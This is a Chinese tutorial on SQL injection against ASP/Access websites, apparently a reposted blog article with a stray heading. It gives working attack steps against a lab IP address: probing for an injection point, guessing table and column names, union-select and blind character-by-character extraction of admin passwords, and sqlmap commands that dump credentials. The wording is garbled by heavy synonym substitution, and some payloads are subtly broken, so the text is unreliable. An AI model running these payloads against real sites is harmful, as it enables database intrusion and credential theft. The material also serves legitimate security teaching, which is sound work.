---- 网易云热评
一、网站分类
1、静态网页

html或者htm是静态页面,不须要做事器解析个中的脚本
特点:不依赖数据库,灵巧性差,制作、更新、掩护麻烦,交互性差,功能受限定,安全,不存在数据库注入漏洞
2、动态页面
asp/aspx/php/jsp等,由相应的脚本引擎来阐明实行
特点:以来数据库,灵巧性好、交互性好、不屈安,存在数据库注入漏洞
二、网站访问流程
三、漏洞产生缘故原由
目标网址:www.aiyou.com/new.php?id=23
1、正常流程数据库返回给网站new页面id为23的信息
2、将参数值23修正为其他的sql语句
3、网站未对该指令进行检测
4、做事器实行了新的语句,并返回给网站
5、客户端根据返回的信息可以连续进一步注入
四、sql注入的危害
1、数据库信息透露
2、网页被修改
3、网页被挂马
4、数据库被恶意操作
5、做事器被远程掌握
6、破快硬盘数据
五、access数据库
一样平常合营asp脚本利用,存储数据不能大于100M,只有一个数据库名称,可以创建多个表
1、数据库后缀:.mdb
2、asp链接access数据库
<%
dim conn,connstr,db
db="Your.mdb"
Set conn = Server.CreateObject("ADODB.Connection")
connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(db)
conn.Open connstr
%>
3、常用打开工具EasyAccess
4、漏洞判断
目标:http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513
判断注入点:
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513/ 报错,可能存在注入
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and 1=1 返回正常
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2 返回缺点 存在注入
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exsits (select from msysobjects) > 0 判断access数据库,根据缺点提示在msysobjects上没有读取数据权限,解释表存在,从而知道是access数据库
5、查询access数据空中的表
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select from user) 根据缺点判断除灭有user表
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select from admin) 正常返回,解释存在admin表
6、判断列名
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and exists(select password from admin),正常返回,解释存在列名password
常用用户名:name username user_name admin adminuser admin_user admin_username adminname
常用密码名:password pass userpass user_pass pwd userpwd adminpwd admin_pwd
7、判断表的列数
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 order by 22 ,正常返回解释有22列,如果没有正常连续修正该数字
8、联合查询
http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin,知道admin表一共有22列,以是联合查询须要输入1-22,页面只显示3和15,可以修正该两列获取想要的数值
六、另一种方法判断:
1、http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and select len(password) from admin)=16 判断密码的长度,返回正常,解释密码长度为16。
2、 http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513 and (select top 1 asc(mid(admin,1,1)) from admin)=97 判断密码的第一位,返回正常,解释密码的第一位是a
判断第二位,成功后修正该值,依次判断剩下的密码
七、sqlmap工具利用
目标地址:http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513
1、测试是否存在漏洞
sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513"
2、获取表名
sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513" --tables
3、获取列名
sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513" --columns -T admin
4、获取指定列的内容
sqlmap -u "http://192.168.21.136/Production/PRODUCT_DETAIL.asp?id=1513" -T admin -C admin,password --dump
禁止造孽,后果自大
欢迎关注"大众号:web安全工具库